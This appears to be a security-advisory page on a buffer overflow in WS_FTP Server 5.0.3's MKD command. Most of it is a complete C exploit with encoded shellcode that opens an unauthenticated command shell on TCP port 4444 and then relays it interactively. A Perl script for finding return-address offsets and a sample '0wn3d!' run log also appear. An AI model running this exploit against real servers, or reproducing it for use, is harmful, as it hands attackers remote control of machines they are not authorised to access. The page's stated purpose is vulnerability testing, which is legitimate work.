WS_FTP Server MKD Buffer Overflow (Exploit)

Summary

WS_FTP Server is "a high-powered, easy-to-use FTP (File Transfer Protocol) server for Windows NT/2000. It allows you to securely share files and folders with customers, vendors, colleagues, and others over the Internet".

A buffer overflow in WS_FTP Server's handling of the MKD command allows an attacker to execute arbitrary code on the server. Note that MKD is only accepted after a successful login, so both the exploit and the helper script below authenticate first (USER/PASS): valid FTP credentials on the target are required. The exploit's payload opens an unauthenticated command shell on TCP port 4444 of the target, so it should only be run against systems you are authorised to test, on an isolated network, and the listener it leaves behind must be cleaned up afterwards. The following exploit code can be used to test your system for the mentioned vulnerability.

Credit:

The information has been provided by NoPh0BiA. The helper script at the end of this page was written by Noam Rathaus of Beyond Security Ltd.


Details

Vulnerable Systems:
 * WS_FTP Server version 5.0.3 (the exploit's hard-coded return address, 0x7C2E9B53, is for Windows 2000 SP4 only — see the RET define; other service packs or Windows releases will most likely need a different address, which the helper script at the end of this page is meant to help locate)

Exploit:
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo 🙂

*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

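#define PORT 21      /* FTP control port on the target */
#define RPORT 4444   /* port the payload listens on after exploitation */
/* Saved return address written over EIP (little-endian 0x7C2E9B53). The
 * original listing had lost the backslashes of the "\x" escapes; they are
 * restored here. The value is tied to the Windows 2000 SP4 build named in
 * the original comment and must be re-located for any other target. */
#define RET "\x53\x9B\x2E\x7C" /*win2k sp4*/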

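/* 399-byte payload appended after the RET/filler in the MKD argument.
 * The bytes are those of the original listing with the stripped "\x"
 * escape backslashes restored. It contains no NUL byte (the exploit
 * appends it with string functions, which would otherwise truncate it).
 * Judging by what the exploit does afterwards - connect to RPORT and
 * expect a Windows command prompt - this is a bind shell on TCP/4444
 * with no authentication; the leading bytes look like a fnstenv-based
 * GetPC stub followed by a dword-XOR decoding loop (TODO confirm by
 * disassembly before relying on either claim). */
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"\x94\x1d\x83\xeb\xfc\xe2\xf4\x4d\x56\xc2\x1d\xb1\xbe\xc7\x48\xe7"
"\xe9\x1f\x71\x95\xa6\x1f\x58\x8d\x35\xc0\x18\xc9\xbf\x7e\x96\xfb"
"\xa6\x1f\x47\x91\xbf\x7f\xfe\x83\xf7\x1f\x29\x3a\xbf\x7a\x2c\x4e"
"\x42\xa5\xdd\x1d\x86\x74\x69\xb6\x7f\x5b\x10\xb0\x79\x7f\xef\x8a"
"\xc2\xb0\x09\xc4\x5f\x1f\x47\x95\xbf\x7f\x7b\x3a\xb2\xdf\x96\xeb"
"\xa2\x95\xf6\x3a\xba\x1f\x1c\x59\x55\x96\x2c\x71\xe1\xca\x40\xea"
"\x7c\x9c\x1d\xef\xd4\xa4\x44\xd5\x35\x8d\x96\xea\xb2\x1f\x46\xad"
"\x35\x8f\x96\xea\xb6\xc7\x75\x3f\xf0\x9a\xf1\x4e\x68\x1d\xda\x30"
"\x52\x94\x1c\xb1\xbe\xc3\x4b\xe2\x37\x71\xf5\x96\xbe\x94\x1d\x21"
"\xbf\x94\x1d\x07\xa7\x8c\xfa\x15\xa7\xe4\xf4\x54\xf7\x12\x54\x15"
"\xa4\xe4\xda\x15\x13\xba\xf4\x68\xb7\x61\xb0\x7a\x53\x68\x26\xe6"
"\xed\xa6\x42\x82\x8c\x94\x46\x3c\xf5\xb4\x4c\x4e\x69\x1d\xc2\x38"
"\x7d\x19\x68\xa5\xd4\x93\x44\xe0\xed\x6b\x29\x3e\x41\xc1\x19\xe8"
"\x37\x90\x93\x53\x4c\xbf\x3a\xe5\x41\xa3\xe2\xe4\x8e\xa5\xdd\xe1"
"\xee\xc4\x4d\xf1\xee\xd4\x4d\x4e\xeb\xb8\x94\x76\x8f\x4f\x4e\xe2"
"\xd6\x96\x1d\xa0\xe2\x1d\xfd\xdb\xae\xc4\x4a\x4e\xeb\xb0\x4e\xe6"
"\x41\xc1\x35\xe2\xea\xc3\xe2\xe4\x9e\x1d\xda\xd9\xfd\xd9\x59\xb1"
"\x37\x77\x9a\x4b\x8f\x54\x90\xcd\x9a\x38\x77\xa4\xe7\x67\xb6\x36"
"\x44\x17\xf1\xe5\x78\xd0\x39\xa1\xfa\xf2\xda\xf5\x9a\xa8\x1c\xb0"
"\x37\xe8\x39\xf9\x37\xe8\x39\xfd\x37\xe8\x39\xe1\x33\xd0\x39\xa1"
"\xea\xc4\x4c\xe0\xef\xd5\x4c\xf8\xef\xc5\x4e\xe0\x41\xe1\x1d\xd9"
"\xcc\x6a\xae\xa7\x41\xc1\x19\x4e\x6e\x1d\xfb\x4e\xcb\x94\x75\x1c"
"\x67\x91\xd3\x4e\xeb\x90\x94\x72\xd4\x6b\xe2\x87\x41\x47\xe2\xc4"
"\xbe\xfc\xed\x3b\xba\xcb\xe2\xe4\xba\xa5\xc6\xe2\x41\x44\x1d";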

/* Remote address used by conn(); refilled on every call (first for the FTP
 * control port, then for the post-exploitation port). Nothing else reads it,
 * so it carries no state between calls - it is global only by convenience. */
struct sockaddr_in hrm;

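/* Write all `len` bytes of `buf` to `fd`, retrying on short writes and on
 * EINTR. Returns 0 on success, -1 with errno set on failure. */
static int write_all(int fd, const char *buf, size_t len)
{
 while (len > 0) {
  ssize_t w = write(fd, buf, len);
  if (w < 0) {
   if (errno == EINTR) continue;
   return -1;
  }
  buf += w;
  len -= (size_t)w;
 }
 return 0;
}

/* Interactive relay between the local terminal and a connected socket.
 * Multiplexes stdin (fd 0) and `sock` with select(): bytes arriving from the
 * socket are copied to stdout, bytes typed locally are copied to the socket.
 * The process exits when the peer closes, when a read fails, or when stdin
 * hits EOF; the function only returns if select() fails for a reason other
 * than a signal interruption.
 *
 * sock: connected TCP socket (in this exploit, the shell listening on RPORT).
 *
 * Fix over the original: the fd_set was never cleared, so the first select()
 * tested whatever bits the uninitialised stack held and later iterations
 * tested stale bits left by the previous select(). */
void shell(int sock)
{
 fd_set fd_read;
 char buff[1024];
 ssize_t n;

 while(1) {
  /* select() rewrites the set, so it must be rebuilt each iteration. */
  FD_ZERO(&fd_read);
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);

  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) {
   if (errno == EINTR) continue;   /* interrupted by a signal: not an error */
   perror("select");
   break;
  }

  if( FD_ISSET(sock, &fd_read) ) {
   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf("Connection closed.\n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   if (write_all(1,buff,(size_t)n) < 0) {
       perror("write local");
       exit(EXIT_FAILURE);
   }
  }

  if ( FD_ISSET(0, &fd_read) ) {
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror("read user");
      exit(EXIT_FAILURE);
    }
    if (write_all(sock,buff,(size_t)n) < 0) {
      perror("write remote");
      exit(EXIT_FAILURE);
    }
  }
 }
 close(sock);
}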

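/* Open a TCP connection to ip:p and return the connected socket descriptor.
 *
 * ip: dotted-quad IPv4 string (parsed with inet_addr(); no DNS lookup)
 * p:  destination port in host byte order
 *
 * Fills the global `hrm` as the original did. Any failure (bad address,
 * socket() or connect() error) is reported on stderr and terminates the
 * process with a non-zero status - the original exited with 0, which hid
 * connection failures from wrapping scripts. */
int conn(char *ip,int p)
{
 int sockfd;

 memset(&hrm, 0, sizeof(hrm));
 hrm.sin_family = AF_INET;
 hrm.sin_port = htons(p);
 hrm.sin_addr.s_addr = inet_addr(ip);
 /* inet_addr() signals a malformed address with INADDR_NONE (all ones);
  * unchecked, that would silently become a connect() to 255.255.255.255. */
 if (hrm.sin_addr.s_addr == INADDR_NONE)
 {
  fprintf(stderr, "invalid IPv4 address: %s\n", ip);
  exit(EXIT_FAILURE);
 }

 sockfd=socket(AF_INET,SOCK_STREAM,0);
 if (sockfd < 0)
 {
  perror("socket");
  exit(EXIT_FAILURE);
 }

 if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(hrm))) < 0)
 {
  perror("connect");
  close(sockfd);
  exit(EXIT_FAILURE);
 }

 printf("[x] Connected to: %s on port %d.\n",ip,p);

 return sockfd;
}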

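/* Entry point. Usage: IP USER PASS
 *
 * 1. connect to IP:PORT (21) and send "USER u\r\nPASS p\r\n" - MKD is only
 *    accepted after login, so valid FTP credentials are required;
 * 2. after a pause, send "MKD " + the 954-byte overflow argument
 *    (519 x 'A', the 4-byte RET, 32 x 'B', the 399-byte shellcode) + CRLF;
 * 3. after another pause, connect to IP:RPORT (4444) and relay that shell.
 *
 * conn() terminates the process if either connection fails, so "0wn3d!" is
 * only printed once the post-exploitation port accepted a connection.
 * Returns 0 on normal completion; exits non-zero on bad arguments or I/O
 * errors.
 *
 * Fixes over the original: the 'A' and 'B' filler blocks were malloc'd
 * without a terminating NUL and then appended with strcat (heap over-read),
 * the 954-byte buffer left no room for strcat's NUL (one-byte heap overflow),
 * and USER/PASS were copied into fixed 32-byte heap buffers with strcpy and
 * sprintf (overflow on long arguments). The payload is now assembled with
 * explicit lengths and the login line is length-checked. */
int main(int argc, char *argv[])
{
 enum { A_LEN = 519, B_LEN = 32, RET_LEN = 4, MKD_LEN = 4, CRLF_LEN = 2 };
 const size_t sc_len = sizeof(shellcode) - 1;               /* NUL excluded */
 const size_t arg_len = A_LEN + RET_LEN + B_LEN + sc_len;   /* 954 bytes */
 const size_t cmd_len = MKD_LEN + arg_len + CRLF_LEN;
 char request[128];
 char *cmd, *p;
 int x, y, len;

 printf("***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***\n");
 if(argc<4)
 {
  fprintf(stderr,"Usage: IP USER PASS\n");
  exit(EXIT_FAILURE);
 }

 /* snprintf returns the length the full string would have had, so a
  * truncated (i.e. corrupted) login line is rejected instead of sent. */
 len = snprintf(request, sizeof(request), "USER %s\r\nPASS %s\r\n", argv[2], argv[3]);
 if (len < 0 || (size_t)len >= sizeof(request))
 {
  fprintf(stderr, "USER/PASS too long for the %lu-byte request buffer\n",
          (unsigned long)sizeof(request));
  exit(EXIT_FAILURE);
 }

 /* Assemble "MKD " + A*519 + RET + B*32 + shellcode + "\r\n" as one message. */
 cmd = malloc(cmd_len);
 if (cmd == NULL)
 {
  perror("malloc");
  exit(EXIT_FAILURE);
 }
 p = cmd;
 memcpy(p, "MKD ", MKD_LEN);     p += MKD_LEN;
 memset(p, 0x41, A_LEN);         p += A_LEN;    /* pad up to the saved EIP */
 memcpy(p, RET, RET_LEN);        p += RET_LEN;  /* overwrites the saved EIP */
 memset(p, 0x42, B_LEN);         p += B_LEN;    /* gap before the payload */
 memcpy(p, shellcode, sc_len);   p += sc_len;
 memcpy(p, "\r\n", CRLF_LEN);    p += CRLF_LEN;

 x = conn(argv[1],PORT);
 printf("[x] Sending Login..");
 if (write(x,request,(size_t)len) != (ssize_t)len)
 {
  perror("write login");
  exit(EXIT_FAILURE);
 }
 printf("done.\n");
 sleep(2);   /* original pacing; presumably lets the server finish the login */

 printf("[x] Sending bad code..");
 if (write(x,cmd,cmd_len) != (ssize_t)cmd_len)
 {
  perror("write MKD");
  exit(EXIT_FAILURE);
 }
 printf("done.\n");
 sleep(2);   /* original pacing; gives the payload time to start listening */
 close(x);
 free(cmd);

 printf("[x] Checking if exploitation was successful..\n");
 y=conn(argv[1],RPORT);
 printf("[x] 0wn3d!\n\n");
 shell(y);
 close(y);
 return 0;
}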

Helper script:
The following Perl script helps find the offsets at which the exploit's RET address and shellcode must be placed. It logs in and sends a single MKD argument of fixed total length (2000 bytes) built as a run of 'A's, the 4-byte marker 'DEEF', a run of 'B's and a run of 'C's. Adjust the 'pre' and 'post' lengths until the crashed server's EIP reads 0x46454544 — the bytes 'DEEF' read as a little-endian x86 dword — which tells you where the return address lands and how much room remains for the shellcode. Note that, as with the exploit, MKD is only accepted after login, so the credentials hard-coded in the script must be valid on the target.

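#!/usr/bin/perl
# WS_FTP RET Address finder
# Noam Rathaus of Beyond Security Ltd.
#
# Sends one oversized MKD argument laid out as
#     'A' x pre . 'DEEF' . 'B' x (2000 - pre - post - 4) . 'C' x post
# so that the value landing in EIP on the crashed server shows whether
# pre/post are aligned ('DEEF' reads as 0x46454544 on little-endian x86).
# MKD is only accepted after authentication, so the script logs in first;
# the hard-coded credentials below must be valid on the target.

use strict;
use warnings;
use IO::Socket::INET;

usage() unless (@ARGV >= 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);
# Optional layout parameters; the defaults are those of the original tool.
my $presize  = shift(@ARGV) || 200;
my $postsize = shift(@ARGV) || 800;

my $RET  = 4;      # width of the 'DEEF' marker expected to reach EIP
my $size = 2000;   # total length of the MKD argument

# 'B' x (negative count) silently yields '' and the argument would no longer
# be $size bytes long, which defeats the alignment test - refuse it up front.
my $fill = $size - $presize - $postsize - $RET;
die "pre ($presize) + post ($postsize) + $RET must not exceed $size\n" if $fill < 0;

my $socket = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $host, PeerPort => $port)
    or die "Cannot connect to $host:$port: $@\n";
$socket->autoflush(1);

# Echo replies until the line carrying $code (e.g. '220 ' ends a multi-line
# banner). A 4xx/5xx reply means the step failed; the original script had no
# such check and simply hung waiting for a code that never came.
sub expect_reply
{
 my ($code) = @_;
 while (<$socket>)
 {
  print $_;
  return if /^$code /;
  die "Unexpected FTP reply: $_" if /^[45]\d\d /;
 }
 die "Connection closed before a '$code' reply\n";
}

# FTP command lines end in CRLF (RFC 959); the C exploit above sends the same.
expect_reply('220');
print $socket "USER noam\r\n";
expect_reply('331');
print $socket "PASS password\r\n";
expect_reply('230');

print $socket 'MKD ' . ('A' x $presize) . 'DEEF' . ('B' x $fill) . ('C' x $postsize) . "\r\n";

# Echo whatever comes back until the server closes the connection
# (a crashed server produces EOF with no reply).
while (<$socket>)
{
 print $_;
}

print "Done.\n";

close($socket);
exit(0);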

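# Print the command-line synopsis and exit with status 1.
# Called from the top of the script when fewer than two arguments are given.
# Fix over the original text: on little-endian x86 the marker bytes 'DEEF'
# (0x44 0x45 0x45 0x46) are read into EIP as 0x46454544, not 0x44454546.
sub usage
{
 print "\nws_ftp.pl MKD alignment assistant\n";
 print "\nUsage: ws_ftp.pl [host] [port] [pre] [post]\n";
 print "We generate something of the sorts of 'A'xpre 'DEEF' 'B'x(2000-pre-post-4) 'C'xpost.\n";
 print "You need to align your pre and post so that the EIP is DEEF 0x46454544\n";
 print "\n";
 exit(1);
}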
